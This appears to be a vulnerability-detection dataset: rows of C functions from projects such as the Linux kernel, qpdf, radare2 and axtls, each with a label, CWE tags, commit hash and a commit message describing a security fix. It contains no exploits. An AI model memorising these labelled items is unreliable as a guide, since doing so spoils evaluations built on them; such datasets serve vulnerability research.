func
stringlengths
0
484k
target
int64
0
1
cwe
listlengths
0
4
project
stringclasses
799 values
commit_id
stringlengths
40
40
hash
float64
1,215,700,430,453,689,100,000,000B
340,281,914,521,452,260,000,000,000,000B
size
int64
1
24k
message
stringlengths
0
13.3k
void __udp4_lib_err(struct sk_buff *skb, u32 info, struct hlist_head udptable[]) { struct inet_sock *inet; struct iphdr *iph = (struct iphdr*)skb->data; struct udphdr *uh = (struct udphdr*)(skb->data+(iph->ihl<<2)); const int type = icmp_hdr(skb)->type; const int code = icmp_hdr(skb)->code; struct sock *sk; int harderr; int err; sk = __udp4_lib_lookup(iph->daddr, uh->dest, iph->saddr, uh->source, skb->dev->ifindex, udptable ); if (sk == NULL) { ICMP_INC_STATS_BH(ICMP_MIB_INERRORS); return; /* No socket for error */ } err = 0; harderr = 0; inet = inet_sk(sk); switch (type) { default: case ICMP_TIME_EXCEEDED: err = EHOSTUNREACH; break; case ICMP_SOURCE_QUENCH: goto out; case ICMP_PARAMETERPROB: err = EPROTO; harderr = 1; break; case ICMP_DEST_UNREACH: if (code == ICMP_FRAG_NEEDED) { /* Path MTU discovery */ if (inet->pmtudisc != IP_PMTUDISC_DONT) { err = EMSGSIZE; harderr = 1; break; } goto out; } err = EHOSTUNREACH; if (code <= NR_ICMP_UNREACH) { harderr = icmp_err_convert[code].fatal; err = icmp_err_convert[code].errno; } break; } /* * RFC1122: OK. Passes ICMP errors back to application, as per * 4.1.3.3. */ if (!inet->recverr) { if (!harderr || sk->sk_state != TCP_ESTABLISHED) goto out; } else { ip_icmp_error(sk, skb, err, uh->dest, info, (u8*)(uh+1)); } sk->sk_err = err; sk->sk_error_report(sk); out: sock_put(sk); }
0
[]
linux-2.6
32c1da70810017a98aa6c431a5494a302b6b9a30
262,028,975,491,376,600,000,000,000,000,000,000,000
65
[UDP]: Randomize port selection. This patch causes UDP port allocation to be randomized like TCP. The earlier code would always choose same port (ie first empty list). Signed-off-by: Stephen Hemminger <[email protected]> Signed-off-by: David S. Miller <[email protected]>
log_cachedanswer (const char *q, const char type[2]) { string ("cached "); logtype (type); space (); name (q); line (); }
0
[ "CWE-362" ]
ndjbdns
847523271f3966cf4618c5689b905703c41dec1c
300,620,640,874,661,160,000,000,000,000,000,000,000
9
Merge identical outgoing requests. This patch fixes dnscache to combine *same* client queries into one single outgoing request, thus securing the server from possible cache poisoning attacks. This fixes one of the cache poisoning vulnerability reported by Mr Mark Johnson -> https://bugzilla.redhat.com/show_bug.cgi?id=838965. Nonetheless the original patch for this issue was created by Mr Jeff king -> http://www.your.org/dnscache/ Sincere thanks to Mr Mark for reporting this issue and Mr Jeff for creating the patch and releasing it under public domain.
QPDF::compute_encryption_key( std::string const& password, EncryptionData const& data) { if (data.getV() >= 5) { // For V >= 5, the encryption key is generated and stored in // the file, encrypted separately with both user and owner // passwords. return recover_encryption_key_with_password(password, data); } else { // For V < 5, the encryption key is derived from the user // password. return compute_encryption_key_from_password(password, data); } }
0
[ "CWE-125" ]
qpdf
dea704f0ab7f625e1e7b3f9a1110b45b63157317
199,059,979,189,168,700,000,000,000,000,000,000,000
17
Pad keys to avoid memory errors (fixes #147)
static int audit_filter_user_rules(struct netlink_skb_parms *cb, struct audit_krule *rule, enum audit_state *state) { int i; for (i = 0; i < rule->field_count; i++) { struct audit_field *f = &rule->fields[i]; int result = 0; switch (f->type) { case AUDIT_PID: result = audit_comparator(cb->creds.pid, f->op, f->val); break; case AUDIT_UID: result = audit_comparator(cb->creds.uid, f->op, f->val); break; case AUDIT_GID: result = audit_comparator(cb->creds.gid, f->op, f->val); break; case AUDIT_LOGINUID: result = audit_comparator(cb->loginuid, f->op, f->val); break; } if (!result) return 0; } switch (rule->action) { case AUDIT_NEVER: *state = AUDIT_DISABLED; break; case AUDIT_ALWAYS: *state = AUDIT_RECORD_CONTEXT; break; } return 1; }
0
[ "CWE-362" ]
linux-2.6
8f7b0ba1c853919b85b54774775f567f30006107
140,985,728,979,997,130,000,000,000,000,000,000,000
34
Fix inotify watch removal/umount races Inotify watch removals suck violently. To kick the watch out we need (in this order) inode->inotify_mutex and ih->mutex. That's fine if we have a hold on inode; however, for all other cases we need to make damn sure we don't race with umount. We can *NOT* just grab a reference to a watch - inotify_unmount_inodes() will happily sail past it and we'll end with reference to inode potentially outliving its superblock. Ideally we just want to grab an active reference to superblock if we can; that will make sure we won't go into inotify_umount_inodes() until we are done. Cleanup is just deactivate_super(). However, that leaves a messy case - what if we *are* racing with umount() and active references to superblock can't be acquired anymore? We can bump ->s_count, grab ->s_umount, which will almost certainly wait until the superblock is shut down and the watch in question is pining for fjords. That's fine, but there is a problem - we might have hit the window between ->s_active getting to 0 / ->s_count - below S_BIAS (i.e. the moment when superblock is past the point of no return and is heading for shutdown) and the moment when deactivate_super() acquires ->s_umount. We could just do drop_super() yield() and retry, but that's rather antisocial and this stuff is luser-triggerable. OTOH, having grabbed ->s_umount and having found that we'd got there first (i.e. that ->s_root is non-NULL) we know that we won't race with inotify_umount_inodes(). So we could grab a reference to watch and do the rest as above, just with drop_super() instead of deactivate_super(), right? Wrong. We had to drop ih->mutex before we could grab ->s_umount. So the watch could've been gone already. That still can be dealt with - we need to save watch->wd, do idr_find() and compare its result with our pointer. If they match, we either have the damn thing still alive or we'd lost not one but two races at once, the watch had been killed and a new one got created with the same ->wd at the same address. That couldn't have happened in inotify_destroy(), but inotify_rm_wd() could run into that. Still, "new one got created" is not a problem - we have every right to kill it or leave it alone, whatever's more convenient. So we can use idr_find(...) == watch && watch->inode->i_sb == sb as "grab it and kill it" check. If it's been our original watch, we are fine, if it's a newcomer - nevermind, just pretend that we'd won the race and kill the fscker anyway; we are safe since we know that its superblock won't be going away. And yes, this is far beyond mere "not very pretty"; so's the entire concept of inotify to start with. Signed-off-by: Al Viro <[email protected]> Acked-by: Greg KH <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
inline void init (hb_face_t *face) { this->blob = OT::Sanitizer<OT::cmap>::sanitize (face->reference_table (HB_OT_TAG_cmap)); const OT::cmap *cmap = OT::Sanitizer<OT::cmap>::lock_instance (this->blob); const OT::CmapSubtable *subtable = NULL; const OT::CmapSubtable *subtable_uvs = NULL; /* 32-bit subtables. */ if (!subtable) subtable = cmap->find_subtable (3, 10); if (!subtable) subtable = cmap->find_subtable (0, 6); if (!subtable) subtable = cmap->find_subtable (0, 4); /* 16-bit subtables. */ if (!subtable) subtable = cmap->find_subtable (3, 1); if (!subtable) subtable = cmap->find_subtable (0, 3); if (!subtable) subtable = cmap->find_subtable (0, 2); if (!subtable) subtable = cmap->find_subtable (0, 1); if (!subtable) subtable = cmap->find_subtable (0, 0); if (!subtable) subtable = cmap->find_subtable (3, 0); /* Meh. */ if (!subtable) subtable = &OT::Null(OT::CmapSubtable); /* UVS subtable. */ if (!subtable_uvs) subtable_uvs = cmap->find_subtable (0, 5); /* Meh. */ if (!subtable_uvs) subtable_uvs = &OT::Null(OT::CmapSubtable); this->table = subtable; this->uvs_table = subtable_uvs; }
0
[ "CWE-703" ]
harfbuzz
63ef0b41dc48d6112d1918c1b1de9de8ea90adb5
224,798,393,177,217,600,000,000,000,000,000,000,000
29
[ot-font] Fix hmtx wrong table length check Discovered by libFuzzer. Ouch! https://github.com/behdad/harfbuzz/issues/139#issuecomment-148289957
static char *r_bin_wasm_type_entry_to_string (RBinWasmTypeEntry *ptr) { if (!ptr || ptr->to_str) { return NULL; } char *ret; int p, i = 0, sz; sz = (ptr->param_count + ptr->return_count) * 5 + 9; // memory leak if (!(ret = (char*) malloc (sz * sizeof(char)))) { return NULL; } strcpy (ret + i, "("); i++; for (p = 0; p < ptr->param_count; p++ ) { R_BIN_WASM_VALUETYPETOSTRING (ret+i, ptr->param_types[p], i); // i+=3 if (p < ptr->param_count - 1) { strcpy (ret+i, ", "); i += 2; } } strcpy (ret + i, ") -> ("); i += 6; if (ptr->return_count == 1) { R_BIN_WASM_VALUETYPETOSTRING (ret + i, ptr->return_type, i); } strcpy (ret + i, ")"); return ret; }
0
[ "CWE-125", "CWE-787" ]
radare2
d2632f6483a3ceb5d8e0a5fb11142c51c43978b4
192,149,553,137,404,560,000,000,000,000,000,000,000
38
Fix crash in fuzzed wasm r2_hoobr_consume_init_expr
void x509_print(const X509_CTX *cert, CA_CERT_CTX *ca_cert_ctx) { if (cert == NULL) return; char not_part_of_cert[30]; strcpy_P(not_part_of_cert, "<Not Part Of Certificate>"); char critical[16]; strcpy_P(critical, "critical, "); printf("=== CERTIFICATE ISSUED TO ===\n"); printf("Common Name (CN):\t\t"); printf("%s\n", cert->cert_dn[X509_COMMON_NAME] ? cert->cert_dn[X509_COMMON_NAME] : not_part_of_cert); printf("Organization (O):\t\t"); printf("%s\n", cert->cert_dn[X509_ORGANIZATION] ? cert->cert_dn[X509_ORGANIZATION] : not_part_of_cert); if (cert->cert_dn[X509_ORGANIZATIONAL_UNIT]) { printf("Organizational Unit (OU):\t"); printf("%s\n", cert->cert_dn[X509_ORGANIZATIONAL_UNIT]); } if (cert->cert_dn[X509_LOCATION]) { printf("Location (L):\t\t\t"); printf("%s\n", cert->cert_dn[X509_LOCATION]); } if (cert->cert_dn[X509_COUNTRY]) { printf("Country (C):\t\t\t"); printf("%s\n", cert->cert_dn[X509_COUNTRY]); } if (cert->cert_dn[X509_STATE]) { printf("State (ST):\t\t\t"); printf("%s\n", cert->cert_dn[X509_STATE]); } if (cert->basic_constraint_present) { printf("Basic Constraints:\t\t%sCA:%s, pathlen:%d\n", cert->basic_constraint_is_critical ? critical : "", cert->basic_constraint_cA? "TRUE" : "FALSE", cert->basic_constraint_pathLenConstraint); } if (cert->key_usage_present) { printf("Key Usage:\t\t\t%s", cert->key_usage_is_critical ? critical : ""); bool has_started = false; if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_DIGITAL_SIGNATURE)) { printf("Digital Signature"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_NON_REPUDIATION)) { if (has_started) printf(", "); printf("Non Repudiation"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_KEY_ENCIPHERMENT)) { if (has_started) printf(", "); printf("Key Encipherment"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_DATA_ENCIPHERMENT)) { if (has_started) printf(", "); printf("Data Encipherment"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_KEY_AGREEMENT)) { if (has_started) printf(", "); printf("Key Agreement"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_KEY_CERT_SIGN)) { if (has_started) printf(", "); printf("Key Cert Sign"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_CRL_SIGN)) { if (has_started) printf(", "); printf("CRL Sign"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_ENCIPHER_ONLY)) { if (has_started) printf(", "); printf("Encipher Only"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_DECIPHER_ONLY)) { if (has_started) printf(", "); printf("Decipher Only"); has_started = true; } printf("\n"); } if (cert->subject_alt_name_present) { printf("Subject Alt Name:\t\t%s", cert->subject_alt_name_is_critical ? critical : ""); if (cert->subject_alt_dnsnames) { int i = 0; while (cert->subject_alt_dnsnames[i]) printf("%s ", cert->subject_alt_dnsnames[i++]); } printf("\n"); } printf("=== CERTIFICATE ISSUED BY ===\n"); printf("Common Name (CN):\t\t"); printf("%s\n", cert->ca_cert_dn[X509_COMMON_NAME] ? cert->ca_cert_dn[X509_COMMON_NAME] : not_part_of_cert); printf("Organization (O):\t\t"); printf("%s\n", cert->ca_cert_dn[X509_ORGANIZATION] ? cert->ca_cert_dn[X509_ORGANIZATION] : not_part_of_cert); if (cert->ca_cert_dn[X509_ORGANIZATIONAL_UNIT]) { printf("Organizational Unit (OU):\t"); printf("%s\n", cert->ca_cert_dn[X509_ORGANIZATIONAL_UNIT]); } if (cert->ca_cert_dn[X509_LOCATION]) { printf("Location (L):\t\t\t"); printf("%s\n", cert->ca_cert_dn[X509_LOCATION]); } if (cert->ca_cert_dn[X509_COUNTRY]) { printf("Country (C):\t\t\t"); printf("%s\n", cert->ca_cert_dn[X509_COUNTRY]); } if (cert->ca_cert_dn[X509_STATE]) { printf("State (ST):\t\t\t"); printf("%s\n", cert->ca_cert_dn[X509_STATE]); } printf("Not Before:\t\t\t%s", ctime(&cert->not_before)); printf("Not After:\t\t\t%s", ctime(&cert->not_after)); printf("RSA bitsize:\t\t\t%d\n", cert->rsa_ctx->num_octets*8); printf("Sig Type:\t\t\t"); switch (cert->sig_type) { case SIG_TYPE_MD5: printf("MD5\n"); break; case SIG_TYPE_SHA1: printf("SHA1\n"); break; case SIG_TYPE_SHA256: printf("SHA256\n"); break; case SIG_TYPE_SHA384: printf("SHA384\n"); break; case SIG_TYPE_SHA512: printf("SHA512\n"); break; default: printf("Unrecognized: %d\n", cert->sig_type); break; } if (ca_cert_ctx) { int pathLenConstraint = 0; char buff[64]; printf("Verify:\t\t\t\t%s\n", x509_display_error(x509_verify(ca_cert_ctx, cert, &pathLenConstraint), buff)); } #if 0 print_blob("Signature", cert->signature, cert->sig_len); bi_print("Modulus", cert->rsa_ctx->m); bi_print("Pub Exp", cert->rsa_ctx->e); #endif if (ca_cert_ctx) { x509_print(cert->next, ca_cert_ctx); } TTY_FLUSH(); }
0
[ "CWE-347" ]
axtls-8266
5efe2947ab45e81d84b5f707c51d1c64be52f36c
219,817,496,274,096,100,000,000,000,000,000,000,000
235
Apply CVE fixes for X509 parsing Apply patches developed by Sze Yiu which correct a vulnerability in X509 parsing. See CVE-2018-16150 and CVE-2018-16149 for more info.
void audit_log_session_info(struct audit_buffer *ab) { unsigned int sessionid = audit_get_sessionid(current); uid_t auid = from_kuid(&init_user_ns, audit_get_loginuid(current)); audit_log_format(ab, " auid=%u ses=%u", auid, sessionid); }
0
[ "CWE-264" ]
net
90f62cf30a78721641e08737bda787552428061e
143,390,169,582,351,600,000,000,000,000,000,000,000
7
net: Use netlink_ns_capable to verify the permisions of netlink messages It is possible by passing a netlink socket to a more privileged executable and then to fool that executable into writing to the socket data that happens to be valid netlink message to do something that privileged executable did not intend to do. To keep this from happening replace bare capable and ns_capable calls with netlink_capable, netlink_net_calls and netlink_ns_capable calls. Which act the same as the previous calls except they verify that the opener of the socket had the desired permissions as well. Reported-by: Andy Lutomirski <[email protected]> Signed-off-by: "Eric W. Biederman" <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void rds_ib_exit(void) { rds_info_deregister_func(RDS_INFO_IB_CONNECTIONS, rds_ib_ic_info); rds_ib_unregister_client(); rds_ib_destroy_nodev_conns(); rds_ib_sysctl_exit(); rds_ib_recv_exit(); rds_trans_unregister(&rds_ib_transport); }
0
[ "CWE-399", "CWE-476" ]
linux
c2349758acf1874e4c2b93fe41d072336f1a31d0
144,851,325,161,921,670,000,000,000,000,000,000,000
9
rds: prevent dereference of a NULL device Binding might result in a NULL device, which is dereferenced causing this BUG: [ 1317.260548] BUG: unable to handle kernel NULL pointer dereference at 000000000000097 4 [ 1317.261847] IP: [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110 [ 1317.263315] PGD 418bcb067 PUD 3ceb21067 PMD 0 [ 1317.263502] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC [ 1317.264179] Dumping ftrace buffer: [ 1317.264774] (ftrace buffer empty) [ 1317.265220] Modules linked in: [ 1317.265824] CPU: 4 PID: 836 Comm: trinity-child46 Tainted: G W 3.13.0-rc4- next-20131218-sasha-00013-g2cebb9b-dirty #4159 [ 1317.267415] task: ffff8803ddf33000 ti: ffff8803cd31a000 task.ti: ffff8803cd31a000 [ 1317.268399] RIP: 0010:[<ffffffff84225f52>] [<ffffffff84225f52>] rds_ib_laddr_check+ 0x82/0x110 [ 1317.269670] RSP: 0000:ffff8803cd31bdf8 EFLAGS: 00010246 [ 1317.270230] RAX: 0000000000000000 RBX: ffff88020b0dd388 RCX: 0000000000000000 [ 1317.270230] RDX: ffffffff8439822e RSI: 00000000000c000a RDI: 0000000000000286 [ 1317.270230] RBP: ffff8803cd31be38 R08: 0000000000000000 R09: 0000000000000000 [ 1317.270230] R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000000 [ 1317.270230] R13: 0000000054086700 R14: 0000000000a25de0 R15: 0000000000000031 [ 1317.270230] FS: 00007ff40251d700(0000) GS:ffff88022e200000(0000) knlGS:000000000000 0000 [ 1317.270230] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 1317.270230] CR2: 0000000000000974 CR3: 00000003cd478000 CR4: 00000000000006e0 [ 1317.270230] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1317.270230] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000090602 [ 1317.270230] Stack: [ 1317.270230] 0000000054086700 5408670000a25de0 5408670000000002 0000000000000000 [ 1317.270230] ffffffff84223542 00000000ea54c767 0000000000000000 ffffffff86d26160 [ 1317.270230] ffff8803cd31be68 ffffffff84223556 ffff8803cd31beb8 ffff8800c6765280 [ 1317.270230] Call Trace: [ 1317.270230] [<ffffffff84223542>] ? rds_trans_get_preferred+0x42/0xa0 [ 1317.270230] [<ffffffff84223556>] rds_trans_get_preferred+0x56/0xa0 [ 1317.270230] [<ffffffff8421c9c3>] rds_bind+0x73/0xf0 [ 1317.270230] [<ffffffff83e4ce62>] SYSC_bind+0x92/0xf0 [ 1317.270230] [<ffffffff812493f8>] ? context_tracking_user_exit+0xb8/0x1d0 [ 1317.270230] [<ffffffff8119313d>] ? trace_hardirqs_on+0xd/0x10 [ 1317.270230] [<ffffffff8107a852>] ? syscall_trace_enter+0x32/0x290 [ 1317.270230] [<ffffffff83e4cece>] SyS_bind+0xe/0x10 [ 1317.270230] [<ffffffff843a6ad0>] tracesys+0xdd/0xe2 [ 1317.270230] Code: 00 8b 45 cc 48 8d 75 d0 48 c7 45 d8 00 00 00 00 66 c7 45 d0 02 00 89 45 d4 48 89 df e8 78 49 76 ff 41 89 c4 85 c0 75 0c 48 8b 03 <80> b8 74 09 00 00 01 7 4 06 41 bc 9d ff ff ff f6 05 2a b6 c2 02 [ 1317.270230] RIP [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110 [ 1317.270230] RSP <ffff8803cd31bdf8> [ 1317.270230] CR2: 0000000000000974 Signed-off-by: Sasha Levin <[email protected]> Signed-off-by: David S. Miller <[email protected]>
ofputil_decode_requestforward(const struct ofp_header *outer, struct ofputil_requestforward *rf) { struct ofpbuf b = ofpbuf_const_initializer(outer, ntohs(outer->length)); /* Skip past outer message. */ enum ofpraw outer_raw = ofpraw_pull_assert(&b); ovs_assert(outer_raw == OFPRAW_OFPT14_REQUESTFORWARD); /* Validate inner message. */ if (b.size < sizeof(struct ofp_header)) { return OFPERR_OFPBFC_MSG_BAD_LEN; } const struct ofp_header *inner = b.data; unsigned int inner_len = ntohs(inner->length); if (inner_len < sizeof(struct ofp_header) || inner_len > b.size) { return OFPERR_OFPBFC_MSG_BAD_LEN; } if (inner->version != outer->version) { return OFPERR_OFPBRC_BAD_VERSION; } /* Parse inner message. */ enum ofptype type; enum ofperr error = ofptype_decode(&type, inner); if (error) { return error; } rf->xid = inner->xid; if (type == OFPTYPE_GROUP_MOD) { rf->reason = OFPRFR_GROUP_MOD; rf->group_mod = xmalloc(sizeof *rf->group_mod); error = ofputil_decode_group_mod(inner, rf->group_mod); if (error) { free(rf->group_mod); return error; } } else if (type == OFPTYPE_METER_MOD) { rf->reason = OFPRFR_METER_MOD; rf->meter_mod = xmalloc(sizeof *rf->meter_mod); ofpbuf_init(&rf->bands, 64); error = ofputil_decode_meter_mod(inner, rf->meter_mod, &rf->bands); if (error) { free(rf->meter_mod); ofpbuf_uninit(&rf->bands); return error; } } else { return OFPERR_OFPBFC_MSG_UNSUP; } return 0; }
0
[ "CWE-772" ]
ovs
77ad4225d125030420d897c873e4734ac708c66b
64,433,588,418,002,400,000,000,000,000,000,000,000
54
ofp-util: Fix memory leaks on error cases in ofputil_decode_group_mod(). Found by libFuzzer. Reported-by: Bhargava Shastry <[email protected]> Signed-off-by: Ben Pfaff <[email protected]> Acked-by: Justin Pettit <[email protected]>
static int ath6kl_usb_map_service_pipe(struct ath6kl *ar, u16 svc_id, u8 *ul_pipe, u8 *dl_pipe) { int status = 0; switch (svc_id) { case HTC_CTRL_RSVD_SVC: case WMI_CONTROL_SVC: *ul_pipe = ATH6KL_USB_PIPE_TX_CTRL; /* due to large control packets, shift to data pipe */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; case WMI_DATA_BE_SVC: case WMI_DATA_BK_SVC: *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_LP; /* * Disable rxdata2 directly, it will be enabled * if FW enable rxdata2 */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; case WMI_DATA_VI_SVC: if (test_bit(ATH6KL_FW_CAPABILITY_MAP_LP_ENDPOINT, ar->fw_capabilities)) *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_LP; else *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_MP; /* * Disable rxdata2 directly, it will be enabled * if FW enable rxdata2 */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; case WMI_DATA_VO_SVC: if (test_bit(ATH6KL_FW_CAPABILITY_MAP_LP_ENDPOINT, ar->fw_capabilities)) *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_LP; else *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_MP; /* * Disable rxdata2 directly, it will be enabled * if FW enable rxdata2 */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; default: status = -EPERM; break; } return status; }
0
[ "CWE-476" ]
linux
39d170b3cb62ba98567f5c4f40c27b5864b304e5
331,975,135,744,320,980,000,000,000,000,000,000,000
54
ath6kl: fix a NULL-ptr-deref bug in ath6kl_usb_alloc_urb_from_pipe() The `ar_usb` field of `ath6kl_usb_pipe_usb_pipe` objects are initialized to point to the containing `ath6kl_usb` object according to endpoint descriptors read from the device side, as shown below in `ath6kl_usb_setup_pipe_resources`: for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) { endpoint = &iface_desc->endpoint[i].desc; // get the address from endpoint descriptor pipe_num = ath6kl_usb_get_logical_pipe_num(ar_usb, endpoint->bEndpointAddress, &urbcount); ...... // select the pipe object pipe = &ar_usb->pipes[pipe_num]; // initialize the ar_usb field pipe->ar_usb = ar_usb; } The driver assumes that the addresses reported in endpoint descriptors from device side to be complete. If a device is malicious and does not report complete addresses, it may trigger NULL-ptr-deref `ath6kl_usb_alloc_urb_from_pipe` and `ath6kl_usb_free_urb_to_pipe`. This patch fixes the bug by preventing potential NULL-ptr-deref (CVE-2019-15098). Signed-off-by: Hui Peng <[email protected]> Reported-by: Hui Peng <[email protected]> Reported-by: Mathias Payer <[email protected]> Reviewed-by: Greg Kroah-Hartman <[email protected]> Signed-off-by: Kalle Valo <[email protected]>
void __init xen_evtchn_2l_init(void) { pr_info("Using 2-level ABI\n"); evtchn_ops = &evtchn_ops_2l; }
0
[ "CWE-400", "CWE-703" ]
linux
e99502f76271d6bc4e374fe368c50c67a1fd3070
518,458,073,832,912,840,000,000,000,000,000,000
5
xen/events: defer eoi in case of excessive number of events In case rogue guests are sending events at high frequency it might happen that xen_evtchn_do_upcall() won't stop processing events in dom0. As this is done in irq handling a crash might be the result. In order to avoid that, delay further inter-domain events after some time in xen_evtchn_do_upcall() by forcing eoi processing into a worker on the same cpu, thus inhibiting new events coming in. The time after which eoi processing is to be delayed is configurable via a new module parameter "event_loop_timeout" which specifies the maximum event loop time in jiffies (default: 2, the value was chosen after some tests showing that a value of 2 was the lowest with an only slight drop of dom0 network throughput while multiple guests performed an event storm). How long eoi processing will be delayed can be specified via another parameter "event_eoi_delay" (again in jiffies, default 10, again the value was chosen after testing with different delay values). This is part of XSA-332. Cc: [email protected] Reported-by: Julien Grall <[email protected]> Signed-off-by: Juergen Gross <[email protected]> Reviewed-by: Stefano Stabellini <[email protected]> Reviewed-by: Wei Liu <[email protected]>
DLLEXPORT int tjPlaneHeight(int componentID, int height, int subsamp) { int ph, nc, retval=0; if(height<1 || subsamp<0 || subsamp>=TJ_NUMSAMP) _throw("tjPlaneHeight(): Invalid argument"); nc=(subsamp==TJSAMP_GRAY? 1:3); if(componentID<0 || componentID>=nc) _throw("tjPlaneHeight(): Invalid argument"); ph=PAD(height, tjMCUHeight[subsamp]/8); if(componentID==0) retval=ph; else retval=ph*8/tjMCUHeight[subsamp]; bailout: return retval; }
0
[]
libjpeg-turbo
dab6be4cfb2f9307b5378d2d1dc74d9080383dc2
71,724,689,303,988,180,000,000,000,000,000,000,000
19
tjDecompressToYUV*(): Fix OOB write/double free ... when attempting to decompress grayscale JPEG images with sampling factors != 1. Fixes #387
static void dirty_memory_extend(ram_addr_t old_ram_size, ram_addr_t new_ram_size) { ram_addr_t old_num_blocks = DIV_ROUND_UP(old_ram_size, DIRTY_MEMORY_BLOCK_SIZE); ram_addr_t new_num_blocks = DIV_ROUND_UP(new_ram_size, DIRTY_MEMORY_BLOCK_SIZE); int i; /* Only need to extend if block count increased */ if (new_num_blocks <= old_num_blocks) { return; } for (i = 0; i < DIRTY_MEMORY_NUM; i++) { DirtyMemoryBlocks *old_blocks; DirtyMemoryBlocks *new_blocks; int j; old_blocks = atomic_rcu_read(&ram_list.dirty_memory[i]); new_blocks = g_malloc(sizeof(*new_blocks) + sizeof(new_blocks->blocks[0]) * new_num_blocks); if (old_num_blocks) { memcpy(new_blocks->blocks, old_blocks->blocks, old_num_blocks * sizeof(old_blocks->blocks[0])); } for (j = old_num_blocks; j < new_num_blocks; j++) { new_blocks->blocks[j] = bitmap_new(DIRTY_MEMORY_BLOCK_SIZE); } atomic_rcu_set(&ram_list.dirty_memory[i], new_blocks); if (old_blocks) { g_free_rcu(old_blocks, rcu); } } }
0
[ "CWE-125" ]
qemu
04bf2526ce87f21b32c9acba1c5518708c243ad0
317,952,706,393,777,630,000,000,000,000,000,000,000
39
exec: use qemu_ram_ptr_length to access guest ram When accessing guest's ram block during DMA operation, use 'qemu_ram_ptr_length' to get ram block pointer. It ensures that DMA operation of given length is possible; And avoids any OOB memory access situations. Reported-by: Alex <[email protected]> Signed-off-by: Prasad J Pandit <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static int edge_tiocmget(struct tty_struct *tty) { struct usb_serial_port *port = tty->driver_data; struct edgeport_port *edge_port = usb_get_serial_port_data(port); unsigned int result = 0; unsigned int msr; unsigned int mcr; unsigned long flags; spin_lock_irqsave(&edge_port->ep_lock, flags); msr = edge_port->shadow_msr; mcr = edge_port->shadow_mcr; result = ((mcr & MCR_DTR) ? TIOCM_DTR: 0) /* 0x002 */ | ((mcr & MCR_RTS) ? TIOCM_RTS: 0) /* 0x004 */ | ((msr & EDGEPORT_MSR_CTS) ? TIOCM_CTS: 0) /* 0x020 */ | ((msr & EDGEPORT_MSR_CD) ? TIOCM_CAR: 0) /* 0x040 */ | ((msr & EDGEPORT_MSR_RI) ? TIOCM_RI: 0) /* 0x080 */ | ((msr & EDGEPORT_MSR_DSR) ? TIOCM_DSR: 0); /* 0x100 */ dev_dbg(&port->dev, "%s -- %x\n", __func__, result); spin_unlock_irqrestore(&edge_port->ep_lock, flags); return result; }
0
[ "CWE-191" ]
linux
654b404f2a222f918af9b0cd18ad469d0c941a8e
25,330,365,245,426,737,000,000,000,000,000,000,000
26
USB: serial: io_ti: fix information leak in completion handler Add missing sanity check to the bulk-in completion handler to avoid an integer underflow that can be triggered by a malicious device. This avoids leaking 128 kB of memory content from after the URB transfer buffer to user space. Fixes: 8c209e6782ca ("USB: make actual_length in struct urb field u32") Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") Cc: stable <[email protected]> # 2.6.30 Signed-off-by: Johan Hovold <[email protected]>
static gboolean property_get_class(const GDBusPropertyTable *property, DBusMessageIter *iter, void *user_data) { struct btd_adapter *adapter = user_data; dbus_uint32_t val = adapter->dev_class; dbus_message_iter_append_basic(iter, DBUS_TYPE_UINT32, &val); return TRUE; }
0
[ "CWE-862", "CWE-863" ]
bluez
b497b5942a8beb8f89ca1c359c54ad67ec843055
275,737,694,779,169,550,000,000,000,000,000,000,000
10
adapter: Fix storing discoverable setting discoverable setting shall only be store when changed via Discoverable property and not when discovery client set it as that be considered temporary just for the lifetime of the discovery.
static const char *strip(char *str) { size_t length; char *result = str; while (*result && l_isspace(*result)) result++; length = strlen(result); if (length == 0) return result; while (l_isspace(result[length - 1])) result[--length] = '\0'; return result; }
0
[ "CWE-310" ]
jansson
8f80c2d83808150724d31793e6ade92749b1faa4
104,903,231,823,454,180,000,000,000,000,000,000,000
16
CVE-2013-6401: Change hash function, randomize hashes Thanks to Florian Weimer and Eric Sesterhenn for reporting, reviewing and testing.
static void tun_cleanup(void) { misc_deregister(&tun_miscdev); rtnl_link_unregister(&tun_link_ops); unregister_netdevice_notifier(&tun_notifier_block); }
0
[ "CWE-476" ]
linux
0ad646c81b2182f7fa67ec0c8c825e0ee165696d
327,405,921,352,101,500,000,000,000,000,000,000,000
6
